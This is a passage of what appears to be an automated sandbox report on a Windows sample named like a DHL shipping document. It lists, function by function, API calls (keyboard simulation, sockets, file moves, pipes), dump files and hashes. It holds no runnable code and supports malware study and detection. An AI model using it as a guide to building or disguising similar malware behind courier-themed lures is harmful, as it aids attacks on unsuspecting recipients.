                                                                                            Function 0088AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 0088AEF9
                                                                                            • GetKeyboardState.USER32(?), ref: 0088AF0E
                                                                                            • SetKeyboardState.USER32(?), ref: 0088AF6F
                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 0088AF9D
                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0088AFBC
                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 0088AFFD
                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0088B020
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                            • String ID:
                                                                                            • API String ID: 87235514-0
                                                                                            • Opcode ID: e89020897a81ec8bf8e4239da43ba6ac5c884f43d32a8901692559821d5e6d13
                                                                                            • Instruction ID: 2e0a1f8b7ef2f1a6c7b0102e40210fe50c8a61140bf01fd11fe16c7f19dda707
                                                                                            • Opcode Fuzzy Hash: e89020897a81ec8bf8e4239da43ba6ac5c884f43d32a8901692559821d5e6d13
                                                                                            • Instruction Fuzzy Hash: BB5115A06047D53DFB3A62348C45BBABFE9BB46304F08858AE2E5D54C2D7D8ACC4D752
                                                                                            Function 0088ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetParent.USER32(00000000), ref: 0088AD19
                                                                                            • GetKeyboardState.USER32(?), ref: 0088AD2E
                                                                                            • SetKeyboardState.USER32(?), ref: 0088AD8F
                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0088ADBB
                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0088ADD8
                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0088AE17
                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0088AE38
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                            • String ID:
                                                                                            • API String ID: 87235514-0
                                                                                            • Opcode ID: 3eb1507b96529414c1399e24c91211e34d6a62a4e9294eb3570fefbb36c8d55e
                                                                                            • Instruction ID: 05b07c37cfd2792d5a844b7eab6cc3c01a9ebe780868c96b9832421599bbf0d9
                                                                                            • Opcode Fuzzy Hash: 3eb1507b96529414c1399e24c91211e34d6a62a4e9294eb3570fefbb36c8d55e
                                                                                            • Instruction Fuzzy Hash: 5A51E6A15047D53DFB3AA3348C95B7ABF98FB46301F08898AE1D5D68C2D394EC84D752
                                                                                            Function 0085542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleCP.KERNEL32(00863CD6,?,?,?,?,?,?,?,?,00855BA3,?,?,00863CD6,?,?), ref: 00855470
                                                                                            • __fassign.LIBCMT ref: 008554EB
                                                                                            • __fassign.LIBCMT ref: 00855506
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00863CD6,00000005,00000000,00000000), ref: 0085552C
                                                                                            • WriteFile.KERNEL32(?,00863CD6,00000000,00855BA3,00000000,?,?,?,?,?,?,?,?,?,00855BA3,?), ref: 0085554B
                                                                                            • WriteFile.KERNEL32(?,?,00000001,00855BA3,00000000,?,?,?,?,?,?,?,?,?,00855BA3,?), ref: 00855584
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1324828854-0
                                                                                            • Opcode ID: ea3281cf7358ddd138d81f1395427732208d9266b1c19570595f570d55d95759
                                                                                            • Instruction ID: 6ca298bd5d533463a27fc54649d777e122820c1d4112117a16d5abd02b7f5449
                                                                                            • Opcode Fuzzy Hash: ea3281cf7358ddd138d81f1395427732208d9266b1c19570595f570d55d95759
                                                                                            • Instruction Fuzzy Hash: 9551C5B1A006499FDB10CFA8D855AEEBBF9FF09301F14412AF955E7291E7309A45CF60
                                                                                            Function 00842D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00842D4B
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00842D53
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00842DE1
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00842E0C
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00842E61
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            • Opcode ID: 30c5373af0678623f616a653d2feb8cbbce01898867aa540199022d884b434e3
                                                                                            • Instruction ID: 05013e509d2958f451040edd51935e417c7f14c5d0034a411409ae6c3dedea75
                                                                                            • Opcode Fuzzy Hash: 30c5373af0678623f616a653d2feb8cbbce01898867aa540199022d884b434e3
                                                                                            • Instruction Fuzzy Hash: C7418A34E0420DABCF10DF68C885A9EBBB5FF45328F548165F815EB292D735AA11CB91
                                                                                            Function 008A10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 008A304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 008A307A
                                                                                              • Part of subcall function 008A304E: _wcslen.LIBCMT ref: 008A309B
                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008A1112
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A1121
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A11C9
                                                                                            • closesocket.WSOCK32(00000000), ref: 008A11F9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                            • String ID:
                                                                                            • API String ID: 2675159561-0
                                                                                            • Opcode ID: 0b5d15a7776c213845675fe75c8d452615994a076fd4f084461ff678cf79872f
                                                                                            • Instruction ID: c5ce30d9de5b9801f96d61eafe8397f0ff79545ff9c4a1d471be27ba06b6f278
                                                                                            • Opcode Fuzzy Hash: 0b5d15a7776c213845675fe75c8d452615994a076fd4f084461ff678cf79872f
                                                                                            • Instruction Fuzzy Hash: 2541F431600214AFEB109F18D888BA9B7E9FF46364F148159F915DB291DB70ED81CBE1
                                                                                            Function 0088CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0088DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0088CF22,?), ref: 0088DDFD
                                                                                              • Part of subcall function 0088DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0088CF22,?), ref: 0088DE16
                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0088CF45
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0088CF7F
                                                                                            • _wcslen.LIBCMT ref: 0088D005
                                                                                            • _wcslen.LIBCMT ref: 0088D01B
                                                                                            • SHFileOperationW.SHELL32(?), ref: 0088D061
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                            • String ID: \*.*
                                                                                            • API String ID: 3164238972-1173974218
                                                                                            • Opcode ID: c6763dade7d98b44bde55f6b9143ac37c9cbe684d78a95642374dcaee6c787f8
                                                                                            • Instruction ID: da139ad8e5060606e5f1f321bda636de6c407ace08420bc44674ed64473e7382
                                                                                            • Opcode Fuzzy Hash: c6763dade7d98b44bde55f6b9143ac37c9cbe684d78a95642374dcaee6c787f8
                                                                                            • Instruction Fuzzy Hash: CB4101719452185FDF12FBA4D981ADEB7B9FF08380F1000A6E645EB142EF74AA89CB51
                                                                                            Function 008B2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008B2E1C
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008B2E4F
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008B2E84
                                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008B2EB6
                                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008B2EE0
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008B2EF1
                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008B2F0B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 2178440468-0
                                                                                            • Opcode ID: a3f2e10f38327cddfa2483adeee65ec5c2c8c2749db15cc9354e0771dd7f5a53
                                                                                            • Instruction ID: e9dd54a426e370712ccbe31904e69219aaa557ea5d14cbc51ce81aaf75feb9eb
                                                                                            • Opcode Fuzzy Hash: a3f2e10f38327cddfa2483adeee65ec5c2c8c2749db15cc9354e0771dd7f5a53
                                                                                            • Instruction Fuzzy Hash: 0B31F030644254AFEB61CF69DC88FA53BA5FBAA710F1501A4F901CB2B2CBB1E840DB51
                                                                                            Function 00887726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00887769
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0088778F
                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00887792
                                                                                            • SysAllocString.OLEAUT32(?), ref: 008877B0
                                                                                            • SysFreeString.OLEAUT32(?), ref: 008877B9
                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 008877DE
                                                                                            • SysAllocString.OLEAUT32(?), ref: 008877EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                            • String ID:
                                                                                            • API String ID: 3761583154-0
                                                                                            • Opcode ID: a18902b34a5ffd0c5cfffc2090165ef2403a5f29136f48237ff8c8e39c31ac81
                                                                                            • Instruction ID: 9e5ff33bb5dd7b1c98c0b94047b87e22ecc9d2a4904841589ed1c0762110a4c5
                                                                                            • Opcode Fuzzy Hash: a18902b34a5ffd0c5cfffc2090165ef2403a5f29136f48237ff8c8e39c31ac81
                                                                                            • Instruction Fuzzy Hash: 3D219C76608219AFDB10BFA8CC88CBA73ACFF09764B148125BA14DB251D670DD41C7A4
                                                                                            Function 008877FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00887842
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00887868
                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0088786B
                                                                                            • SysAllocString.OLEAUT32 ref: 0088788C
                                                                                            • SysFreeString.OLEAUT32 ref: 00887895
                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 008878AF
                                                                                            • SysAllocString.OLEAUT32(?), ref: 008878BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                            • String ID:
                                                                                            • API String ID: 3761583154-0
                                                                                            • Opcode ID: d5f82a78918aac89cc2654a466530e02c064a0661feb35d20bbb69817e9e8266
                                                                                            • Instruction ID: c9b4c0d7ae8bdda4d9c0b1b9553229eabddd456e3f640a976b066dc98cfc948a
                                                                                            • Opcode Fuzzy Hash: d5f82a78918aac89cc2654a466530e02c064a0661feb35d20bbb69817e9e8266
                                                                                            • Instruction Fuzzy Hash: 38217431608108AFDB10AFA8DC88DAA77FCFB497607208135F915CB2A1DA70DD41CB78
                                                                                            Function 008904D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 008904F2
                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0089052E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHandlePipe
                                                                                            • String ID: nul
                                                                                            • API String ID: 1424370930-2873401336
                                                                                            • Opcode ID: e354eab677d06e378f09dd9fbc0564fc8a12d44352c2c19d3a24ccf565dd7252
                                                                                            • Instruction ID: 7ea7601bae8db50d64e8a15ae51a74b34b94ca9246eaa9256720b226936851d4
                                                                                            • Opcode Fuzzy Hash: e354eab677d06e378f09dd9fbc0564fc8a12d44352c2c19d3a24ccf565dd7252
                                                                                            • Instruction Fuzzy Hash: 9B216D75500305AFDF20AF69DC44A9A77B8FF44764F654A29F8A1E62E0D7709940CF20
                                                                                            Function 008905A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 008905C6
                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00890601
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHandlePipe
                                                                                            • String ID: nul
                                                                                            • API String ID: 1424370930-2873401336
                                                                                            • Opcode ID: a229d6cb33cf9de0653b963c500b03c47de6f43606c2224c1750ccf9bdb9c443
                                                                                            • Instruction ID: 9bb2b30ba2dabd958bfe864b8887c2b1c14cd02c17e880a6020e55f0133af672
                                                                                            • Opcode Fuzzy Hash: a229d6cb33cf9de0653b963c500b03c47de6f43606c2224c1750ccf9bdb9c443
                                                                                            • Instruction Fuzzy Hash: 7D2151755003059FDF21AF699C04A9A77E8FFA5724F240B19F8A1E72E0D7709960CF20
                                                                                            Function 008B40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0082600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0082604C
                                                                                              • Part of subcall function 0082600E: GetStockObject.GDI32(00000011), ref: 00826060
                                                                                              • Part of subcall function 0082600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0082606A
                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008B4112
                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008B411F
                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008B412A
                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008B4139
                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008B4145
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                            • String ID: Msctls_Progress32
                                                                                            • API String ID: 1025951953-3636473452
                                                                                            • Opcode ID: 67a06b6b8977975554608ab7439cb3333ef34e216fd607255eda5a6ca48451f5
                                                                                            • Instruction ID: 952cb7745f472d7e136d448c5091c4cc58fe5c279b73d4cec6ecf35248bc3162
                                                                                            • Opcode Fuzzy Hash: 67a06b6b8977975554608ab7439cb3333ef34e216fd607255eda5a6ca48451f5
                                                                                            • Instruction Fuzzy Hash: C71190B215021DBEEF119E68CC86EE77F9DFF19798F004111BA18E2150C6729C61DBA4
                                                                                            Function 0085D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0085D7A3: _free.LIBCMT ref: 0085D7CC
                                                                                            • _free.LIBCMT ref: 0085D82D
                                                                                              • Part of subcall function 008529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000), ref: 008529DE
                                                                                              • Part of subcall function 008529C8: GetLastError.KERNEL32(00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000,00000000), ref: 008529F0
                                                                                            • _free.LIBCMT ref: 0085D838
                                                                                            • _free.LIBCMT ref: 0085D843
                                                                                            • _free.LIBCMT ref: 0085D897
                                                                                            • _free.LIBCMT ref: 0085D8A2
                                                                                            • _free.LIBCMT ref: 0085D8AD
                                                                                            • _free.LIBCMT ref: 0085D8B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                            • Instruction ID: 054db6233d99eb8f1647700af4086d67aded4711d33133fc6d2e4356e3c61c67
                                                                                            • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                            • Instruction Fuzzy Hash: 1D115E71540B04AAD631BFB4CC47FCB7FDCFF09702F400825BE99E6992DA65B5098662
                                                                                            Function 0088DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0088DA74
                                                                                            • LoadStringW.USER32(00000000), ref: 0088DA7B
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0088DA91
                                                                                            • LoadStringW.USER32(00000000), ref: 0088DA98
                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0088DADC
                                                                                            Strings
                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0088DAB9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
